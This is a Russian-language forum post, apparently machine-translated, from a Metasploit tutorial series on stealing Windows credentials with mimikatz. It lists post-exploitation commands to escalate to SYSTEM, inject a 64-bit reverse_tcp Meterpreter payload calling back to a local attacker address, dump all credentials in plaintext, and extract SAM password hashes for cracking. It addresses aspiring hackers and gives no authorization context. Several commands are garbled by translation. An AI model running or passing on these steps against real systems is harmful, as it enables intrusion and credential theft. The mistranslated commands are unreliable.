Основы Metasploit, часть 21: Получение учетных данных с помощью mimikatz

  • Автор темы Автор темы LeSh1y777
  • Дата начала Дата начала

LeSh1y777

Пользователь
Регистрация
25/9/25
Сообщения
5,682
Репутация
49
Лайки
152
Депозит
-8.95$
Metasploit — настолько мощный инструмент, что я могу лишь поверхностно описать его возможности. Благодаря многолетнему развитию, Metasploit теперь можно использовать практически для любых целей: от разведки до пост-эксплуатации и заметания следов. Учитывая его универсальность, каждому начинающему хакеру следует хотя бы поверхностно ознакомиться с Metasploit.

Время от времени появляются модули пост-эксплуатации, настолько мощные, что каждый пользователь Metasploit должен знать о них и научиться их использовать. Mimikatz — один из таких модулей. Он был создан Бенджамином Дельпи, также известным как gentilkiwi, для самостоятельного изучения языка C и изучения безопасности Windows. По сути, он способен извлекать из памяти различные наборы учётных данных Windows. Он сыграл ключевую роль в иранском взломе Sands Corporation в 2014 году.

6a4a49_86c97b6e207e474f839045722fcbbe9e~mv2.jpg


Изначально Mimikatz разрабатывался как автономный модуль, который можно загрузить на целевую платформу или запустить локально, но недавно Rapid7 портировал его для Metasploit и сделал доступным в виде скрипта Meterpreter. Преимущество этого заключается в том, что он полностью работает в памяти и не оставляет следов на жёстком диске, которые могли бы быть обнаружены.

Ещё один важный момент, прежде чем мы начнём: существуют как 32-, так и 64-битные версии Mimikatz. Зачастую Mimikatz загружает 32-битную версию, если мы использовали 32-битный процесс для взлома системы. В этом случае Mimikatz практически не будет работать. Чтобы избежать этой потенциальной проблемы, используйте команду «migrate» для миграции Meterpeter в 64-битный процесс перед загрузкой Mimkatz. Таким образом, он загрузит 64-битную версию, и вы сможете насладиться всеми её потрясающими возможностями.

Шаг 1: используйте цель и получите полезную нагрузку Meterpreter

Mimikatz — это модуль, работающий после эксплуатации, то есть его можно использовать только после того, как уязвимость цели будет эксплуатирована. Поэтому я начну этот модуль, предполагая, что вы успешно эксплуатировали цель и установили полезную нагрузку Meterpreter на целевой системе. Кроме того, для работы Mimikatz вам потребуются права системного администратора на целевой системе. Если вы эксплуатировали цель как обычный пользователь, вы можете использовать команду Meterpreter getsystem для повышения привилегий до уровня системного администратора.

meterpreter > getsystem

6a4a49_f5b38d90a67d4be38fae0a0d4a290f74~mv2.png


meterpreter > загрузить kiwi

6a4a49_1810e8c8122a4464a43f345030037734~mv2.png


Обратите внимание на предупреждение о том, что мы загрузили x86 Kiwi на архитектуру x64. Для использования всех возможностей Kiwi на этой целевой системе нам необходимо загрузить 64-битную полезную нагрузку. Давайте загрузим 64-битный meterpreter на эту 64-битную архитектуру Windows 7.

Во-первых, нам нужно перевести meterpreter в фоновый режим, чтобы мы снова могли получить доступ к командной строке msf5.

meterpreter > фон

Далее нам нужно загрузить модуль payload_inject.

msf5 > использовать windows/local/payload_inject

Затем задайте полезную нагрузку, которую мы хотим внедрить.

msf5 > установить окно полезной нагрузки/x64/meterpreter/reverse_tcp

Установите локальный хост.

msf > установить LHOST 192.168.1.103

И подключите его к фоновому сеансу meterpreter.

msf5 > установить СЕАНС 11

6a4a49_562e7926c66448d888caf862794a7fc7~mv2.png


Прежде чем запустить модуль ввода полезной нагрузки, давайте проверим, все ли опции установлены.

msf5 > показать параметры

6a4a49_e97cc6186d7c435587ea467a87666a42~mv2.png


Если все настроено правильно, то теперь можно «эксплуатировать».

msf5 > эксплойт

Теперь, имея 64-битную полезную нагрузку, мы можем эффективно запускать kiwi на 64-битной системе.

6a4a49_96072cbab4fd42e5a02402045ed19003~mv2.png


Далее попробуем открыть экран справки на kiwi.

meterpreter> помощь kiwi

6a4a49_7974723c27574677ab9ac39d9fa57d9d~mv2.png


Самая первая команда, которую мы видим, — id creds_all . Она извлекает все учётные данные из оперативной памяти и выводит их на экран.

6a4a49_d37c37d3751a4a98bf19a6c5170f05bf~mv2.png


Как вы можете видеть выше, модуль kiwi системы mimikatz отображает все учетные данные этой системы открытым текстом!

Запуск mimikatz в 32-битной системе

Чтобы запустить mimikatz из 32-битной полезной нагрузки, мы можем ввести:

meterpreter > load mimkatz

Далее, давайте получим экран справки.

meterpreter > help mimikatz

6a4a49_fdf22a75d28540888ab1e5dc5384d3be~mv2.png


Как вы можете видеть, mimikatz имеет ряд собственных команд и специальную команду mimikatz_command для запуска пользовательских команд.

Прежде чем двигаться дальше, давайте проверим версию Mimikatz.

meterpreter > mimikatz_command -f версия

6a4a49_384f989d0a5e48b185169c24240319d9~mv2.png


Metasploit перенес только версию 1.0, хотя Mimikatz имеет версию 2.0 (следите за моим будущим руководством по использованию автономной версии 2.0 Mimikatz).

Шаг 2: Собственные команды

Давайте начнём с того, что посмотрим, что можно сделать с системой с помощью встроенных команд. Если мы хотим получить учётные данные Kerberos, нам нужно просто ввести:

meterpreter > kerberos

6a4a49_ac4df91c4fea447b8333acacbc6c8176~mv2.png


Мы можем получить учетные данные Windows MSV (пакет проверки подлинности паролей Windows), просто введя:

meterpreter > msv

6a4a49_b5916ce15f1a4fcbaf36fb149f162e9f~mv2.png


Шаг 3: Mimikatz__Command

Mimikatz также позволяет создавать собственные команды. Синтаксис команд следующий. Обратите внимание на двойное двоеточие (::) между типом команды и её действием.

mimikatz_command -f <тип команды>::<действие команды>

Если мы хотим извлечь хеши паролей из файла SAM, мы можем ввести:

meterpreter > mimikatz_command -f samdump::hashes

6a4a49_9a35d6a43e2d45afa67bcc2042c58f8c~mv2.png


Конечно, имея эти хеши, мы можем затем взломать их с помощью любого из множества инструментов взлома паролей, таких как Cain and Abel, Hashcat, John the Ripper и других.

Если мы хотим получить список служб, запущенных в целевой системе, мы можем использовать тип команды service в сочетании со списком действий команды.

meterpreter > mimikatz_command -f service::list

6a4a49_7b699938fe584bd594d77235ae6f236c~mv2.png


Шаг 4: Криптовалюта

В Mimikatz есть специальный тип команд для работы с криптографией, и, как и следовало ожидать, он называется crypto. С помощью этой команды мы можем получить список поставщиков криптографии в целевой системе.

meterpreter > mimikatz_command -f crypto::listProviders

6a4a49_816ded506b7348dca8f7032bb2d2d2aa~mv2.png


Если мы хотим узнать, где находятся различные хранилища криптографии, мы можем ввести:

meterpreter > mimikatz_command -f crypto::listStores

6a4a49_f37f5855a7ae471d9f0fb3d67b6e0d16~mv2.png


Mimikatz — ещё один мощный инструмент для пентестера/хакера. Прежде чем использовать Mimkatz, убедитесь, что вы достаточно хорошо разбираетесь в Metasploit.
 
Назад
Сверху Снизу